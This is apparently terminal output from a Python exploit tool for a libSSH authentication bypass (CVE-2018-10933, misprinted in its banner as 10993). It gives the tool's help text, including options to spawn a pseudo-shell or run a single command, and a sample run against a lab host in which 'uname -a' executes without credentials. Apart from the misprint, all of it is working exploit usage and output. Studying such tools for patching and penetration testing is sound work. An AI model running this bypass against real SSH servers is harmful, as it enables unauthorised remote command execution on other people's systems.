$ python3 cve-2018-10933.py -h
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
usage: cve-2018-10933.py [-h] [-p PORT] [-s] [-c COMMAND] [--logfile LOGFILE]
                         [-v] [-d]
                         host

If there was neither shell nor command option specified - exploit will switch
to detect mode yielding vulnerable/not vulnerable flag.

positional arguments:
  host                  Hostname/IP address that is running vulnerable libSSH
                        server.

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  libSSH port
  -s, --shell           Exploit the vulnerability and spawn pseudo-shell
  -c COMMAND, --command COMMAND
                        Execute single command.
  --logfile LOGFILE     Logfile to write paramiko connection logs
  -v, --verbose         Display verbose output.
  -d, --debug           Display debug output.

$ python3 cve-2018-10933.py 192.168.56.100 -v -c 'uname -a'
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
[+] Connected to the target: 192.168.56.100:22
[?] Obtained banner: "SSH-2.0-libssh_0.8.3"
[+] Target seems to be VULNERABLE!
[?] Connecting with 192.168.56.100:22 ...
[+] Connected.
$ uname -a
Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux